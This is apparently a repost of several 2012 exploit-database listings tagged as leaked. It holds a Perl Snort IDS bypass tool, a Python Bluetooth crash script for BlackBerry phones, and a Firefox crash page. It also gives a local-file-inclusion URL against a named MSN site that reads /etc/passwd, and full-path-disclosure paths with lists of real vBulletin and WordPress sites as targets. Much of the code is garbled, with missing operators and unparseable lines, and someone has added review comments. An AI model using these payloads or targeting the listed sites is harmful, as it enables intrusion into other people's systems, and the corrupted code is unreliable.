  1. Yousef

    GoogleMarket bug for Android 4.1.1=>4.2 Remote Target DL PoC

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    Google Market bug for Android 4.1.1 => 4.2 Jelly Bean Remote Target Download PoC
     
    You need:
    1. A Google account
    2. An Android device
    3. A PC browser
     
    You can install an unlimited number of apps on the remote device from a browser on a PC.
     
    The key is:
    1) You entered your Google account once on the Android device.
    2) If you manage to get hold of someone else's account (Gmail), you can install any app from the Google Play Market on this device,
    3) without asking the owner of the device for agreement.
     
    In this way you can install malicious software, or install so many apps that the device's memory fills up.
     
    # 1337day.com [2012-12-12]
    MS Office Excel 2007 Seven Memory Corruption Vulnerability

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    you can download POC from 
     
    http
    ://1337day.com/private_files/msexcel2007poc.rar 

    mirror http://www.mediafire.com/download.php?gc9h1yowx04c1c9
     
    # 1337day.com [2012-12-12]
    Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    #!/usr/bin/perl
    use IO::Socket;
     
    # By Xianur0
    [email protected]
    # http://loscaballeros.mx/
    # Snort Multiple HTTP Bypass
     
    # Number of rules flagged by analizerules(); checkrules() prints it at the end.
    my $bypasscount=0;
    # Usage text when no argument is given.  NOTE(review): the ')' that should
    # close die( before `unless` is missing in this listing, as are several
    # operators further down -- the pasted code does not parse as shown.
    die(
    "Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n"unless($ARGV[0]);
    # An existing file or directory selects rule-audit mode; any other
    # argument is taken to be a target URL and handed to tests().
    if(-
    f $ARGV[0] || -d $ARGV[0]){
    print 
    "[-] Analyzing Rules...\n\n";
    checkrules($ARGV[0]);
    } else {
    tests();
    }
     
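    # Write a 16-bytes-per-row hex dump of the string in $_[0] to the currently
    # selected output handle (STDOUT unless the caller changed it).
    #
    # Row layout: the offset as "0x%08x (%05d)", then the 16 bytes -- a full
    # row as four big-endian 32-bit words, a short final row byte by byte with
    # blank cells so the columns stay aligned -- then the ASCII rendering, in
    # which bytes outside 0x20..0x7e are shown as '.'.
    #
    # Arguments: $_[0] -- the byte string to dump.
    # Returns:   nothing; the output is the side effect.
    sub hdump {
        my ($data) = @_;
        my $offset = 0;
        # One "a16" per full row plus "a*" for the remainder.  When the length
        # is an exact multiple of 16 the remainder is an empty string; it is
        # skipped rather than printed as a blank row.
        my $layout = ('a16' x int(length($data) / 16)) . 'a*';
        for my $row (unpack($layout, $data)) {
            my $len = length $row;
            next unless $len;
            my ($format, @cols);
            if ($len == 16) {
                @cols   = unpack('N4', $row);
                $format = "0x%08x (%05d)   %08x %08x %08x %08x   %s\n";
            }
            else {
                @cols = map { sprintf '%2.2x', $_ } unpack('C*', $row);
                push @cols, '  ' while @cols < 16;    # blank cells for the missing bytes
                $format = "0x%08x (%05d)"
                        . "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n";
            }
            (my $ascii = $row) =~ tr/\0-\37\177-\377/./;
            printf $format, $offset, $offset, @cols, $ascii;
            $offset += 16;
        }
        return;
    }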
     
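    # Expand Snort "pipe hex" in a content string: every |xx xx ...| group is
    # replaced by the raw bytes it denotes, e.g. 'a|3F|b' -> 'a?b'.
    #
    # Groups are decoded in a single left-to-right pass, so bytes that happen
    # to decode to '|' or to hex digits are not re-interpreted.  (The original
    # re-scanned the string until no group matched, which double-decoded such
    # output, and it leaked $cadena/$remplazo/$caracter as package globals.)
    #
    # Arguments: $_[0] -- the content string as written in the rule.
    # Returns:   the decoded string; input without pipe groups comes back
    #            unchanged, and only well-formed groups of hex byte pairs are
    #            touched -- anything else between pipes is left as is.
    sub snorthexdecode {
        my ($encoded) = @_;
        $encoded =~ s{ \| ( (?: \s* [0-9A-Fa-f]{2} \s* )+ ) \| }{
            my $group = $1;
            join '', map { chr hex $_ } $group =~ /([0-9A-Fa-f]{2})/g;
        }gex;
        return $encoded;
    }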
    # Walk $_[0] (a rules file, or a directory that is recursed into) and
    # report rules whose HTTP content match is tied to one literal string.
    # Two checks are made on each rule line, using only the first content:
    # of the rule:
    #   * http_uri rules whose decoded content looks like "<name.ext>?<query>"
    #     are reported together with the same URI carrying an extra leading
    #     parameter ("?junk&");
    #   * http_header rules whose decoded content is "Header: value" (single
    #     space after the colon) are reported with a tab in place of the space.
    # Each hit prints the rule and the variant and increments the file-scope
    # $bypasscount.  From the defender's side the remedy is the same for both:
    # match the path and the parameter name (or the header name and its value)
    # as separate content checks rather than one literal string.
    # NOTE(review): RULE and DIR are bareword package-global handles, so the
    # recursive call for a subdirectory clobbers the caller's DIR iterator and
    # the nested <RULE> reads overwrite the caller's $_; the 2-arg `open` lets
    # a path starting with '<', '>' or '|' change the open mode and its result
    # is never checked -- prefer `open my $fh, '<', $pathrules or die "$!"`.
    # Line breaks inside tokens, the missing comma in opendir and the missing
    # brace before the trailing `elsif` are artifacts of how the listing was
    # pasted.
    sub analizerules {
    my $pathrules=$_[0];
    if(-
    f $pathrules){
    open RULE,$pathrules;
    while(<
    RULE>) {
    my $rule=$_;
    $rule=~s/[\r\n]+$//g;
    # URI check: decode the content string first, then look for name.ext
    # followed by a literal '?' (or its |3F| form) and a query.
    if($rule=~/http_uri;/ && $rule=~/content:\s*"([^"]+)"/i){
    if(snorthexdecode($1)=~/([^"
    ]*\.\w{1,4})(\|3F\||\?)([^"]+)/){
    my 
    $bypass=$1."?junk&".$3;
    print "
    [!] Vuln rule ".$pathrules."".$rule."\n[!] URI Bypass".$bypass."\n\n";
    $bypasscount++;
    }
    # Header check: "Name: value" with exactly one space after the colon.
    } elsif(
    $rule=~/http_header;/ && $rule=~/content:"([^\"]+)"/){
    if(
    snorthexdecode($1)=~/^([^\:\s]+\:) (.+)$/){
    my $bypass=$1."\t".$2;
    print 
    "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
    $bypasscount++;
    }
    }
    }
    # Directory: recurse into every entry except "." and ".." (any name made
    # only of dots is skipped).
    elsif(-d $pathrules) {
    opendir (DIR$pathrules);
    while(
    readdir DIR) {
    analizerules($pathrules."/".$_) if($_ !~/^\.+$/);
    }
    }
    }
    # Entry point for rule-audit mode: analyse the file or directory in $_[0]
    # and print how many rules were flagged.  The count is the file-scope
    # $bypasscount, which analizerules() increments and nothing resets, so a
    # second call in the same process keeps counting from the previous total.
    sub checkrules {
    my $checkpath=$_[0];
    analizerules($checkpath);
    print 
    "[-] Bypassed rules: ".$bypasscount."\n";
    }
    # Target mode: parse the URL in $ARGV[0] (http only; an optional :port is
    # split off, default 80), then open a fresh TCP connection for each of
    # two request variants, hex-dump the bytes sent, and hex-dump whatever
    # the server returns until it closes the connection:
    #   1st: a HEAD for $path preceded by four bare "\n" characters;
    #   2nd: the same bytes pipelined after $payload -- two POSTs padded with
    #        runs of CRLF, the second declaring Content-Length: 30 while only
    #        10 body bytes follow.
    # Per the usage text this is meant to show whether an inspecting sensor
    # still sees the HEAD in those framings; the response is only dumped for
    # the operator, nothing is parsed.
    # NOTE(review) -- defects visible as written:
    #   * `if($path !~ "/(.+)"){ die ...; $path=$1; }` -- the assignment after
    #     die() is unreachable, so $path is never trimmed;
    #   * $encodedpath is built and printed but used in neither packet;
    #   * @orders names five tests but only two packets are ever sent;
    #   * $encodedpath, @orders, @packets, $i and $packet are undeclared
    #     globals (the file has no `use strict`), and `new IO::Socket::INET`
    #     is indirect-object syntax -- write IO::Socket::INET->new(...);
    #   * the socket is created without a Timeout, so `while(<$sock>)` blocks
    #     until the server closes the connection;
    #   * "Seding" in the progress message is a typo;
    #   * the closing brace of the sub is missing as rendered -- the final
    #     `}` closes only the foreach.
    sub tests {
    my $host="";
    my $port=80;
    my $path="";
    # Split "http://host[:port]/path"; anything that is not http is rejected
    # by the colon check below.
    if(
    $ARGV[0]=~/^http:\/\/([^\/]+)(.*)$/){
    $host=$1;
    $path=$2;
    if(
    $host=~/^([^\:]+)\:(\d+)$/){
    $host=$1;
    $port=$2;
    }
    }
    if(
    $host!~/^[^\:]+$/){
    die(
    'Invalid URL!');
    }
    print 
    "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
    if(
    $path !~ "/(.+)"){
    die(
    'I need a path...');
    $path=$1;
    }
    # Percent-encode every byte of the path except '/'; informational only.
    $encodedpath=$path;
    $encodedpath=~s/([^\/])/"%" uc(sprintf("%2.2x",ord($1)))/eg;
    print 
    "[-] Encoded path: ".$encodedpath."\n";
    @
    orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
    my $payload="POST / HTTP/1.1\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: 0\r\n".
    "Connection: Keep-Alive\r\n".
    "Host: ".$host.("\r\n"x12).
    "POST / HTTP/1.1\r\n".
    "Host: ".$host."\r\n".
    "Connection: Keep-Alive\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: 30".("\r\n"x12).
    "1234567890";
     
    @
    packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
    $packets[1]=$payload.$packets[0];
     
    $i=0;
    foreach 
    $packet (@packets){
    my $sock = new IO::Socket::INET (
    PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp',
    Reuse => 1,
    );
    die 
    "Could not create socket: $!\n" unless $sock;
    print 
    "[-] Seding ".$orders[$i]." test...\n";
    hdump($packet);
    print 
    $sock $packet;
    print 
    "\n[+] Headers:\n";
    # Accumulate the whole response, then dump it once the peer closes.
    my $todo="";
    while(<
    $sock>){
    $todo.=$_;
    }
    close($sock);
    hdump($todo);
    $i++;
    }

     
    # 1337day.com [2012-12-12]
    MSN LFI Vulnerability

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    http://logitheque.msn.fr/recherche/recherche.php?searchstring=../../../../../../../../etc/passwd%00&plus=telecharger&chaine=forums 
     
    # 1337day.com [2012-12-12]
    Blackberry OBEX PUSH Crash (Bluetooth) PoC

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    #!/usr/bin/python
     
    #Blackberry Bluetooth Crash (OBEX PUSH)
    # By Xianur0
    [email protected]
    # First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel])
    # By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc...
    # ATTENTION: The channel of obex push can vary from blackberry to blackberry
     
    import binascii
    import serial
     
    # Local file to push and the name announced to the peer.  Both are
    # hard-coded; the assignment below is split across two lines as rendered.
    filetosend
    ="/home/xianur0/image.jpg"
    nametosend="crashingyou.jpg"
     
    # Hex-encode `string` with a zero byte before each character: "00" then
    # hex(ch) + "00" for every char.  Presumably an approximation of the
    # 16-bit (UTF-16BE-style) encoding OBEX uses for Name headers -- confirm
    # against the spec before relying on it.  Note hex(ord(x))[2:] is not
    # zero-padded, so characters below 0x10 yield a single digit and shift the
    # rest of the string.  Python 2 str semantics assumed.
    # NOTE(review): the '=' in `hexstring = "00"` is missing as rendered.
    def filenamed(string):
    hexstring "00"
    for x in string:
    hexstring += hex(ord(x))[2:]+"00"
    return hexstring
     
    # Interpret the raw byte string `hexstring` as a big-endian unsigned
    # integer: each byte becomes two zero-padded hex digits, the digits are
    # joined and parsed with base 16.  Despite the name this is bytes-to-int,
    # not binary-to-decimal; int(binascii.hexlify(s), 16) is the stdlib
    # equivalent.  Python 2 str semantics (ord on a 1-char str) assumed.
    # NOTE(review): several '=' signs and the comma in int(hexval, 16) are
    # missing as rendered.
    def bin2dec
    (hexstring):
    hexval ""
    for a in hexstring:
    aux hex(ord(a))[2:]
    if 
    len(aux) < 2:
    aux "0"+aux
    hexval 
    += aux
    return int(hexval16)
     
    # Render the integer `dec` as a hex string padded to `largo` bytes
    # (2*largo digits): hex() without the "0x" prefix, padded to an even digit
    # count, then left-padded with "00" per missing byte.  Presumably meant as
    # '%0*x' % (2*largo, dec); values wider than `largo` bytes are not
    # truncated.
    # NOTE(review): as rendered the even-length test has lost its operand
    # (`(len(retorno)/2)*!= len(retorno)`), and `if(len(retorno)/largo):`
    # reads as a truthiness test on the integer quotient rather than a
    # comparison -- with Python 2 integer division that skips the padding
    # exactly when the value is shorter than `largo` bytes.  The comparison
    # operator was probably lost in the paste; verify against a clean copy.
    def dec2hex(dec,largo):
    retorno hex(dec)[2:]
    if (
    len(retorno)/2)*!= len(retorno):
    retorno "0"+retorno
    if(len(retorno)/largo):
    for 
    i in range(largo-(len(retorno)/2)):
    retorno "00"+retorno
    return retorno
     
    # Push `filepath` to the peer over the RFCOMM serial device as an OBEX PUT
    # announced under `filename`.  Return codes: 1 = could not open the serial
    # device, 2 = unexpected response byte, 4 = any exception while sending.
    # `serialrf.close()` / `return 0` after the loop are unreachable: the
    # `while True` is only left through those returns.
    # Byte values as written, read against the public OBEX spec (presumably
    # what the author followed): 0x80 = CONNECT, 0xA0 = Success, 0x10 =
    # Continue, 0x01 = Name header, 0xC3 = Length header, 0x02 = PUT,
    # 0x48 = Body header.
    # NOTE(review): every pass of the loop re-sends CONNECT and then the same
    # first `sizefragment` (38) bytes of the file -- `fragmento` is always
    # filebinary[0:sizefragment] and no offset is ever advanced -- so the file
    # is never actually transferred; the length fields combine `sizefragment`,
    # `len(fragmento)` and `lengthheader` with +3/+4/+12 adjustments that the
    # code does not explain.  Bare `except:` clauses swallow the real error
    # (an empty read makes ord('') raise, which surfaces only as return code
    # 4), `filehandler` is never closed, and the `print` statements are
    # Python 2.  Missing '=' / '+' / ',' tokens and the `if largo 0:`
    # comparison are artifacts of how the listing was pasted.
    def enviar
    (filepath,filename):
    serialrf None
    print "Loading..."
    try:
    serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0
    except:
    return 
    1
    print "Ok!"
    # Name encoded by filenamed(); the whole file is read into memory.
    filename filenamed(filename)
    filebinary ""
    filehandler open(filepath,'rb')
    for 
    linea in filehandler.readlines():
    filebinary += linea
    lengthfile 
    len(filebinary)
    print 
    "File Size:",lengthfile
    sizefragment 
    38
    while True:
    try:
    print 
    "Sending bytes..."
    serialrf.write(binascii.unhexlify("80000710001000")) # initialise: OBEX CONNECT
    print "Reading..."
    # First response byte is the status; on a0/10 the next two bytes give the
    # packet length and the remainder of the packet is read into `resto`,
    # which is not used afterwards.
    status serialrf.read(1)
    print 
    hex(ord(status))
    if 
    hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10":
    resto serialrf.read(2)
    largo bin2dec(resto)-3
    if largo 0:
    resto serialrf.read(largo)
    else:
    return 
    2
    # Name header + Length header, then a PUT wrapping them and one Body
    # header holding the (always first) fragment.
    header 
    "01"+dec2hex((len(filename)/2)+4,2) + filename "00c3" dec2hex(len(filebinary),4)
    lengthheader = (len(filename)/2)+12
    fragmento 
    filebinary[0:sizefragment]
    envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2))
    envio += fragmento
    serialrf
    .write(envio)
    except:
    return 
    4
    serialrf
    .close()
    return 
    0
     
     
    # Runs immediately, at import as well as when executed, with the
    # hard-coded paths above; the closing parenthesis is missing as rendered.
    # NOTE(review): an `if __name__ == '__main__':` guard would be usual here.
    enviar
    (filetosend,nametosend
     
    # 1337day.com [2012-12-12]
    Mozilla FireFox 17.0.1 Memory Corruption PoC

    <!--
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm KedAns-Dz member from Inj3ct0r Team                1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
     
    ###
    # Title : Mozilla FireFox 17.0 Memory Corruption p0c
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com .net .org
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : local - 0day
    # Type : Local Exploit - proof of concept
    # Tested on : Linux SUSE - Enterprise v.11
    # Download : [http://download.cdn.mozilla.net/pub/mozilla.org/firefox/releases/17.0.1/linux-i686/fr/firefox-17.0.1.tar.bz2]
    ###
     
    # <3 <3 Greetings t0 Palestine <3 <3
    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
     
    -->
     
    <html>
    <head>
    <title>Memory Corruption bY KedAns-Dz</title>
    <body onload="javascript:KedAns();">
    <script language="JavaScript">
    // Builds an ever-growing string and writes it into the document.
    // What the visible code does: sixteen unescape() calls concatenate a fixed
    // literal into `puf` (as rendered here the literal is already decoded to
    // CJK characters, so the original escape sequence is not recoverable from
    // the page), then a loop triples `buffer` on every iteration
    // (buffer += buffer + buffer) and document.write()s the result.  After k
    // iterations the string is 3^(k+1) characters long, so the page will run
    // out of memory or throw long before i reaches 999.  Nothing in the code
    // controls *what* is overwritten: from a defender's view this is a
    // resource-exhaustion page, and the "memory corruption" claim in the
    // header is not demonstrated by the code itself.
    // NOTE(review): `i` is assigned without var (implicit global), the
    // `buffer` declaration has no terminating semicolon, and the function's
    // closing brace is missing as rendered -- the final `}` closes only the
    // for-loop.
    function KedAns()
    {
     
    // (puf) it's just for make a buffer and Crash !
    // some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes
    var puf =unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
     
    document.write(puf); // Buffer1
     
    var buffer = '\x41\x42\x43' // ABC buffer
    // Exponential growth: length triples each pass.
    for(i=0; i <= 999 ; ++i)
    {
    buffer+=buffer+buffer
    document.write(buffer); // Corrupt this !!!
     
    }
     
    // [ Memory Corruption !! (*__^) ]
     

    </script>
    </head>
    </body>
    </html>
    <!--
     
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
    #============================================================================================================ --> 
     
    # 1337day.com [2012-12-12]
    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    The Full Path Disclosure is in vBulletin 4.2.0, in forumrunner. With a Full Path Disclosure you can get the filesystem path of the forum you are on and also (most of the time it is the same) the cPanel username.
     
    To see it go to:
     
    http://[path]/forumrunner/include/album.php
     
    It works on 90% of the forums.
     
     
    Example:
    http://www.mgcproducts.com/forumrunner/include/album.php
    http://atheistdiscussion.com/forumrunner/include/album.php
    http://apolyton.net/forumrunner/include/album.php
    http://www.romaniancommunity.net/forumrunner/include/album.php
    http://www.ghosthax.com/forumrunner/include/album.php
    http://www.reddotcity.net/forumrunner/include/album.php
    http://www.sevenskins.com/forum/forumrunner/include/album.php
    http://www.purevb.com/forumrunner/include/album.php
    http://forum.hackersbrasil.com.br/forumrunner/include/album.php 
     
    # 1337day.com [2012-12-12]
    Wordpress 3.4.2 Full Path Disclosure Vulnerability

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    The Full Path Disclosure is in WordPress <= 3.4.2. With this information you can get the filesystem path of the site you are on and (in most cases) the cPanel username.
     
    To see it go to:
     
    http://[path]/wp-includes/rss-functions.php
     
     
    Examples:
    http://tsmp.us/wp-includes/rss-functions.php
    http://tafeio.com/wp-includes/rss-functions.php
    http://santana1540.com.br/wp-includes/rss-functions.php
     
    It works on 90% of the websites.
     
    # 1337day.com [2012-12-12]
    vBulletin 4.x/5.x multiple Full Path Disclosure Vuln

    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    /includes/api/commonwhitelist_2.php
    /includes/api/commonwhitelist_5.php
    /includes/api/commonwhitelist_6.php
    /includes/api/1/album_album.php
    /includes/api/1/album_editalbum.php
    /includes/api/1/album_latest.php
    /includes/api/1/album_overview.php
    /includes/api/1/album_picture.php
    /includes/api/1/album_user.php
    /includes/api/1/announcement_edit.php
    /includes/api/1/announcement_view.php
    /includes/api/1/api_cmscategorylist.php
    /includes/api/1/api_cmssectionlist.php
    /includes/api/1/api_forumlist.php
    /includes/api/1/api_getnewtop.php
    /includes/api/1/api_getsecuritytoken.php
    /includes/api/1/api_getsessionhash.php
    /includes/api/1/api_init.php
    /includes/api/1/api_mobilepublisher.php
    /includes/api/1/api_usersearch.php
    /includes/api/1/blog_blog.php
    /includes/api/1/blog_bloglist.php
    /includes/api/1/blog_comments.php
    /includes/api/1/blog_custompage.php
    /includes/api/1/blog_dosendtofriend.php
    /includes/api/1/blog_list.php
    /includes/api/1/blog_members.php
    /includes/api/1/blog_post_comment.php
    /includes/api/1/blog_post_editblog.php
    /includes/api/1/blog_post_editcomment.php
    /includes/api/1/blog_post_edittrackback.php
    /includes/api/1/blog_post_newblog.php
    /includes/api/1/blog_post_postcomment.php
    /includes/api/1/blog_post_updateblog.php
    /includes/api/1/blog_sendtofriend.php
    /includes/api/1/blog_subscription_entrylist.php
    /includes/api/1/blog_subscription_userlist.php
    /includes/api/1/blog_usercp_addcat.php
    /includes/api/1/blog_usercp_editcat.php
    /includes/api/1/blog_usercp_editoptions.php
    /includes/api/1/blog_usercp_editprofile.php
    /includes/api/1/blog_usercp_modifycat.php
    /includes/api/1/blog_usercp_updateprofile.php
    /includes/api/1/editpost_editpost.php
    /includes/api/1/editpost_updatepost.php
    /includes/api/1/forum.php
    /includes/api/1/forumdisplay.php
    /includes/api/1/inlinemod_domergeposts.php
    /includes/api/1/list.php
    /includes/api/1/login_lostpw.php
    /includes/api/1/member.php
    /includes/api/1/memberlist_search.php
    /includes/api/1/misc_showattachments.php
    /includes/api/1/misc_whoposted.php
    /includes/api/1/newreply_newreply.php
    /includes/api/1/newreply_postreply.php
    /includes/api/1/newthread_postthread.php
    /includes/api/1/newthread_newthread.php
    /includes/api/1/poll_newpoll.php
    /includes/api/1/poll_polledit.php
    /includes/api/1/poll_showresults.php
    /includes/api/1/private_editfolders.php
    /includes/api/1/private_insertpm.php
    /includes/api/1/private_messagelist.php
    /includes/api/1/private_newpm.php
    /includes/api/1/private_showpm.php
    /includes/api/1/private_trackpm.php
    /includes/api/1/profile_editattachments.php
    /includes/api/1/profile_editoptions.php
    /includes/api/1/profile_editprofile.php
    /includes/api/1/register_addmember.php
    /includes/api/1/register_checkdate.php
    /includes/api/1/search_process.php
    /includes/api/1/search_showresults.php
    /includes/api/1/showthread.php
    /includes/api/1/subscription_addsubscription.php
    /includes/api/1/subscription_editfolders.php
    /includes/api/1/subscription_viewsubscription.php
    /includes/api/1/threadtag_managetags.php
    /includes/api/2/album_picture.php
    /includes/api/2/api_blogcategorylist.php
    /includes/api/2/blog_blog.php
    /includes/api/2/blog_bloglist.php
    /includes/api/2/blog_list.php
    /includes/api/2/blog_subscription_entrylist.php
    /includes/api/2/blog_subscription_userlist.php
    /includes/api/2/blog_usercp_groups.php
    /includes/api/2/content.php
    /includes/api/2/editpost_editpost.php
    /includes/api/2/forumdisplay.php
    /includes/api/2/member.php
    /includes/api/2/newreply_newreply.php
    /includes/api/2/forum.php
    /includes/api/2/poll_newpoll.php
    /includes/api/2/poll_polledit.php
    /includes/api/2/poll_showresults.php
    /includes/api/2/private_messagelist.php
    /includes/api/2/private_trackpm.php
    /includes/api/2/profile_editattachments.php
    /includes/api/2/search_showresults.php
    /includes/api/2/showthread.php
    /includes/api/3/api_gotonewpost.php
    /includes/api/4/album_user.php
    /includes/api/4/api_forumlist.php
    /includes/api/4/api_getnewtop.php
    /includes/api/4/breadcrumbs_create.php
    /includes/api/4/facebook_getforumid.php
    /includes/api/4/facebook_getnewforummembers.php
    /includes/api/4/get_vbfromfacebook.php
    /includes/api/4/login_facebook.php
    /includes/api/4/newreply_postreply.php
    /includes/api/4/newthread_postthread.php
    /includes/api/4/register.php
    /includes/api/4/register_addmember.php
    /includes/api/4/search_findusers.php
    /includes/api/4/subscription_viewsubscription.php
    /includes/api/5/api_init.php
    /includes/api/6/api_getnewtop.php
    /includes/api/6/api_gotonewpost.php
    /includes/api/6/content.php
    /includes/api/6/member.php
    /includes/api/6/newthread_newthread.php
    /includes/block/blogentries.php
    /includes/block/cmsarticles.php
    /includes/block/html.php
    /includes/block/newposts.php
    /includes/block/sgdiscussions.php
    /includes/block/tagcloud.php
    /includes/block/threads.php
    /forumrunner/include/subscriptions.php
    /forumrunner/include/search_forum.php
    /forumrunner/include/profile.php
    /forumrunner/include/post.php
    /forumrunner/include/pms.php
    /forumrunner/include/online.php
    /forumrunner/include/moderation.php
    /forumrunner/include/misc.php
    /forumrunner/include/login.php
    /forumrunner/include/get_thread.php
    /forumrunner/include/get_forum.php
    /forumrunner/include/cms.php
    /forumrunner/include/attach.php
    /forumrunner/include/announcement.php
    /forumrunner/include/album.php
    /forumrunner/support/vbulletin_methods.php
    /forumrunner/support/stringparser_bbcode.class.php
    /forumrunner/support/utils.php
    /forumrunner/support/other_methods.php
    /packages/skimlinks/hooks/postbit_display_complete.php
    /packages/skimlinks/hooks/showthread_complete.php
    /packages/skimlinks/hooks/userdata_start.php 
     
    # 1337day.com [2012-12-12]
    RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC

    <!--
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm KedAns-Dz member from Inj3ct0r Team                1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
     
    ###
    # Title : RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com .net .org
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : local - 0day
    # Type : Local Exploit - proof of concept
    # Tested on : Windows7 (Fr)
    ###
     
    # <3 <3 Greetings t0 Palestine <3 <3
